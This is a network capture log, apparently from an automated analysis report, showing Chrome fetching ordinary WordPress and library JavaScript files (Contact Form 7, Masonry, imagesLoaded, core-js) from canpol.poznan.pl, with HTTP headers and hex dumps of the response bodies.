                                                            46192.168.2.1649761178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC629OUTGET /wp-content/themes/salient/nectar/assets/functions/ajax-search/wpss-search-suggest.js HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:00 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:01:20 GMT
                                                            ETag: "b5d-620a8ffe491b7"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 2909
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:00 UTC2909INData Raw: 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 7b 20 20 0a 09 0a 09 69 66 28 24 28 27 23 73 65 61 72 63 68 2d 6f 75 74 65 72 2e 6e 65 63 74 61 72 27 29 2e 6c 65 6e 67 74 68 20 3e 20 30 29 7b 0a 09 09 0a 09 20 20 20 20 76 61 72 20 61 63 73 5f 61 63 74 69 6f 6e 20 3d 20 27 6d 79 70 72 65 66 69 78 5f 61 75 74 6f 63 6f 6d 70 6c 65 74 65 73 65 61 72 63 68 27 3b 20 20 0a 09 20 20 20 20 24 28 22 62 6f 64 79 22 29 2e 6f 6e 28 27 66 6f 63 75 73 27 2c 27 23 73 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 20 20 20 20 09 0a 09 20 20 20 20 09 69 66 28 21 24 28 74 68 69 73 29 2e 68 61 73 43 6c 61 73 73 28 27 75 69 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 69 6e 70 75 74 27 29 29 20 7b 0a 09 09 20 20 20 20 09 24
                                                            Data Ascii: jQuery(document).ready(function ($){ if($('#search-outer.nectar').length > 0){ var acs_action = 'myprefix_autocompletesearch'; $("body").on('focus','#s',function(){ if(!$(this).hasClass('ui-autocomplete-input')) { $


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            47192.168.2.1649762178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC609OUTGET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:00 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:50 GMT
                                                            ETag: "32bb-620a8ec3e75ef"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 12987
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:00 UTC7906INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 74 5b 72 5d 29 72 65 74 75 72 6e 20 74 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 74 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 6e 2e 63 3d 74 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 6e 2e 6f 28 65 2c 74 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 6e 2e 72 3d 66 75 6e
                                                            Data Ascii: !function(e){var t={};function n(r){if(t[r])return t[r].exports;var o=t[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=fun
                                                            2025-01-15 10:08:00 UTC5081INData Raw: 65 6c 65 63 74 6f 72 41 6c 6c 28 22 69 6d 67 2e 77 70 63 66 37 2d 63 61 70 74 63 68 61 2d 22 2e 63 6f 6e 63 61 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 72 29 7d 29 29 3b 76 61 72 20 6f 3d 2f 28 5b 30 2d 39 5d 2b 29 5c 2e 28 70 6e 67 7c 67 69 66 7c 6a 70 65 67 29 24 2f 2e 65 78 65 63 28 72 29 3b 6f 26 26 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 5f 77 70 63 66 37 5f 63 61 70 74 63 68 61 5f 63 68 61 6c 6c 65 6e 67 65 5f 27 2e 63 6f 6e 63 61 74 28 6e 2c 27 22 5d 27 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 76 61 6c 75 65 3d 6f 5b 31 5d 7d 29 29 7d 3b 66 6f 72 28 76 61
                                                            Data Ascii: electorAll("img.wpcf7-captcha-".concat(n)).forEach((function(e){e.setAttribute("src",r)}));var o=/([0-9]+)\.(png|gif|jpeg)$/.exec(r);o&&e.querySelectorAll('input[name="_wpcf7_captcha_challenge_'.concat(n,'"]')).forEach((function(e){e.value=o[1]}))};for(va


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            48192.168.2.1649763178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC589OUTGET /wp-includes/js/imagesloaded.min.js?ver=4.1.4 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:00 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:13:49 GMT
                                                            ETag: "15fd-620a92c8939cf"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 5629
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:00 UTC5629INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 69 6d 61 67 65 73 4c 6f 61 64 65 64 20 50 41 43 4b 41 47 45 44 20 76 34 2e 31 2e 34 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 69 73 20 61 6c 6c 20 6c 69 6b 65 20 22 59 6f 75 20 69 6d 61 67 65 73 20 61 72 65 20 64 6f 6e 65 20 79 65 74 20 6f 72 20 77 68 61 74 3f 22 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 65 76 2d 65 6d 69 74 74 65 72 2f 65 76 2d 65 6d 69 74 74 65 72 22 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66
                                                            Data Ascii: /*! This file is auto-generated *//*! * imagesLoaded PACKAGED v4.1.4 * JavaScript is all like "You images are done yet or what?" * MIT License */!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            49192.168.2.1649764178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC421OUTGET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:00 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:28 GMT
                                                            ETag: "4056-620a932780dd7"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 16470
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:00 UTC7906INData Raw: 2f 2a 2a 0a 20 2a 20 63 6f 72 65 2d 6a 73 20 33 2e 31 31 2e 30 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 7a 6c 6f 69 72 6f 63 6b 2f 63 6f 72 65 2d 6a 73 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 3a 2f 2f 72 6f 63 6b 2e 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 6f 72 67 0a 20 2a 20 c2 a9 20 32 30 32 31 20 44 65 6e 69 73 20 50 75 73 68 6b 61 72 65 76 20 28 7a 6c 6f 69 72 6f 63 6b 2e 72 75 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 53 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 2c 65 2c 6f 3b 65 3d 7b 7d 2c 28 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 5b 74 5d 29 72 65 74 75 72 6e 20 65 5b 74 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6e 3d 65 5b 74 5d 3d 7b 69 3a 74 2c 6c 3a 21 31 2c 65 78 70 6f
                                                            Data Ascii: /** * core-js 3.11.0 * https://github.com/zloirock/core-js * License: http://rock.mit-license.org * 2021 Denis Pushkarev (zloirock.ru) */!function(S){"use strict";var r,e,o;e={},(o=function(t){if(e[t])return e[t].exports;var n=e[t]={i:t,l:!1,expo
                                                            2025-01-15 10:08:00 UTC8000INData Raw: 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 63 3d 72 2e 64 61 74 61 3d 7b 7d 2c 75 3d 72 2e 4e 41 54 49 56 45 3d 22 4e 22 2c 66 3d 72 2e 50 4f 4c 59 46 49 4c 4c 3d 22 50 22 3b 74 2e 65 78 70 6f 72 74 73 3d 72 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 31 35 29 2c 6f 3d 72 28 31 36 29 2c 69 3d 72 28 32 38 29 2c 72 3d 72 28 34 37 29 2c 63 3d 69 28 22 49 45 5f 50 52 4f 54 4f 22 29 2c 75 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 3b 74 2e 65 78 70 6f 72 74 73 3d 72 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6f 28 74 29 2c 65 28 74 2c 63 29 3f 74 5b 63 5d 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 63 6f 6e
                                                            Data Ascii: toLowerCase()},c=r.data={},u=r.NATIVE="N",f=r.POLYFILL="P";t.exports=r},function(t,n,r){var e=r(15),o=r(16),i=r(28),r=r(47),c=i("IE_PROTO"),u=Object.prototype;t.exports=r?Object.getPrototypeOf:function(t){return t=o(t),e(t,c)?t[c]:"function"==typeof t.con
                                                            2025-01-15 10:08:00 UTC564INData Raw: 6e 67 54 61 67 2c 7b 76 61 6c 75 65 3a 22 4d 6f 64 75 6c 65 22 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 7d 2c 6f 2e 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 69 66 28 31 26 74 26 26 28 6e 3d 6f 28 6e 29 29 2c 38 26 74 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 34 26 74 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 6e 26 26 6e 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 6e 3b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 69 66 28 6f 2e 72 28 72 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 64 65 66 61 75 6c 74 22 2c 7b 65 6e 75 6d 65 72 61 62 6c
                                                            Data Ascii: ngTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},o.t=function(n,t){if(1&t&&(n=o(n)),8&t)return n;if(4&t&&"object"==typeof n&&n&&n.__esModule)return n;var r=Object.create(null);if(o.r(r),Object.defineProperty(r,"default",{enumerabl


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            50192.168.2.1649765178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC434OUTGET /wp-includes/js/dist/hooks.min.js?ver=a7edae857aab69d69fa10d5aef23a5de HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:14:55 GMT
                                                            ETag: "1540-620a93080e405"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 5440
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC5440INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 74 68 69 73 2e 77 70 3d 74 68 69 73 2e 77 70 7c 7c 7b 7d 2c 74 68 69 73 2e 77 70 2e 68 6f 6f 6b 73 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 69 66 28 74 5b 65 5d 29 72 65 74 75 72 6e 20 74 5b 65 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 74 5b 65 5d 3d 7b 69 3a 65 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 6e 5b 65 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 72 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 72 2e 6d 3d 6e 2c 72 2e 63 3d 74 2c 72 2e 64 3d 66 75 6e 63 74 69 6f 6e
                                                            Data Ascii: /*! This file is auto-generated */this.wp=this.wp||{},this.wp.hooks=function(n){var t={};function r(e){if(t[e])return t[e].exports;var o=t[e]={i:e,l:!1,exports:{}};return n[e].call(o.exports,o,o.exports,r),o.l=!0,o.exports}return r.m=n,r.c=t,r.d=function


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            51192.168.2.1649766178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC584OUTGET /wp-includes/js/masonry.min.js?ver=4.2.2 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:01 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:13:45 GMT
                                                            ETag: "5e4a-620a92c4c7f42"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 24138
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC7906INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 4d 61 73 6f 6e 72 79 20 50 41 43 4b 41 47 45 44 20 76 34 2e 32 2e 32 0a 20 2a 20 43 61 73 63 61 64 69 6e 67 20 67 72 69 64 20 6c 61 79 6f 75 74 20 6c 69 62 72 61 72 79 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6d 61 73 6f 6e 72 79 2e 64 65 73 61 6e 64 72 6f 2e 63 6f 6d 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 20 62 79 20 44 61 76 69 64 20 44 65 53 61 6e 64 72 6f 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 6a 71 75 65 72 79 2d 62 72 69 64 67 65 74 2f 6a 71 75 65 72 79 2d
                                                            Data Ascii: /*! This file is auto-generated *//*! * Masonry PACKAGED v4.2.2 * Cascading grid layout library * https://masonry.desandro.com * MIT License * by David DeSandro */!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-
                                                            2025-01-15 10:08:01 UTC8000INData Raw: 74 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 69 7a 65 3d 65 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 7d 2c 64 2e 63 73 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 29 7b 76 61 72 20 6e 3d 75 5b 69 5d 7c 7c 69 3b 65 5b 6e 5d 3d 74 5b 69 5d 7d 7d 2c 64 2e 67 65 74 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2c 65 3d 74 68 69 73 2e 6c 61 79 6f 75 74 2e 5f 67 65 74 4f 70 74 69 6f 6e 28 22 6f 72 69 67 69 6e 4c 65 66 74 22 29 2c 69 3d 74 68 69 73 2e 6c 61 79 6f 75 74 2e 5f 67 65 74 4f 70 74 69 6f 6e 28
                                                            Data Ascii: tSize=function(){this.size=e(this.element)},d.css=function(t){var e=this.element.style;for(var i in t){var n=u[i]||i;e[n]=t[i]}},d.getPosition=function(){var t=getComputedStyle(this.element),e=this.layout._getOption("originLeft"),i=this.layout._getOption(
                                                            2025-01-15 10:08:01 UTC8000INData Raw: 7d 2c 66 2e 6c 61 79 6f 75 74 49 74 65 6d 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 73 46 6f 72 4c 61 79 6f 75 74 28 74 29 2c 74 68 69 73 2e 5f 6c 61 79 6f 75 74 49 74 65 6d 73 28 74 2c 65 29 2c 74 68 69 73 2e 5f 70 6f 73 74 4c 61 79 6f 75 74 28 29 7d 2c 66 2e 5f 67 65 74 49 74 65 6d 73 46 6f 72 4c 61 79 6f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 21 74 2e 69 73 49 67 6e 6f 72 65 64 7d 29 7d 2c 66 2e 5f 6c 61 79 6f 75 74 49 74 65 6d 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 74 68 69 73 2e 5f 65 6d 69 74 43 6f 6d 70 6c 65 74 65 4f 6e 49 74 65 6d 73 28 22 6c 61 79 6f 75 74 22 2c 74 29 2c
                                                            Data Ascii: },f.layoutItems=function(t,e){t=this._getItemsForLayout(t),this._layoutItems(t,e),this._postLayout()},f._getItemsForLayout=function(t){return t.filter(function(t){return!t.isIgnored})},f._layoutItems=function(t,e){if(this._emitCompleteOnItems("layout",t),
                                                            2025-01-15 10:08:01 UTC232INData Raw: 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 2c 65 3d 74 68 69 73 2e 63 6f 6c 73 3b 2d 2d 65 26 26 30 3d 3d 3d 74 68 69 73 2e 63 6f 6c 59 73 5b 65 5d 3b 29 74 2b 2b 3b 72 65 74 75 72 6e 28 74 68 69 73 2e 63 6f 6c 73 2d 74 29 2a 74 68 69 73 2e 63 6f 6c 75 6d 6e 57 69 64 74 68 2d 74 68 69 73 2e 67 75 74 74 65 72 7d 2c 6e 2e 6e 65 65 64 73 52 65 73 69 7a 65 4c 61 79 6f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 43 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 28 29 2c 74 21 3d 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 7d 2c 69 7d 29 3b
                                                            Data Ascii: h=function(){for(var t=0,e=this.cols;--e&&0===this.colYs[e];)t++;return(this.cols-t)*this.columnWidth-this.gutter},n.needsResizeLayout=function(){var t=this.containerWidth;return this.getContainerWidth(),t!=this.containerWidth},i});


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            52192.168.2.1649768178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC599OUTGET /wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:01 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:02 GMT
                                                            ETag: "71b-620a930e55a3c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1819
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC1819INData Raw: 2f 2a 21 0a 20 2a 20 4d 61 73 6f 6e 72 79 20 76 32 20 73 68 69 6d 0a 20 2a 20 74 6f 20 6d 61 69 6e 74 61 69 6e 20 62 61 63 6b 77 61 72 64 73 20 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 0a 20 2a 20 61 73 20 6f 66 20 4d 61 73 6f 6e 72 79 20 76 33 2e 31 2e 32 0a 20 2a 0a 20 2a 20 43 61 73 63 61 64 69 6e 67 20 67 72 69 64 20 6c 61 79 6f 75 74 20 6c 69 62 72 61 72 79 0a 20 2a 20 68 74 74 70 3a 2f 2f 6d 61 73 6f 6e 72 79 2e 64 65 73 61 6e 64 72 6f 2e 63 6f 6d 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 20 62 79 20 44 61 76 69 64 20 44 65 53 61 6e 64 72 6f 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62 3d 61 2e 4d 61 73 6f 6e 72 79 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 72 65 6d 61 70 56 32
                                                            Data Ascii: /*! * Masonry v2 shim * to maintain backwards compatibility * as of Masonry v3.1.2 * * Cascading grid layout library * http://masonry.desandro.com * MIT License * by David DeSandro */!function(a){"use strict";var b=a.Masonry;b.prototype._remapV2


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            53192.168.2.1649769178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
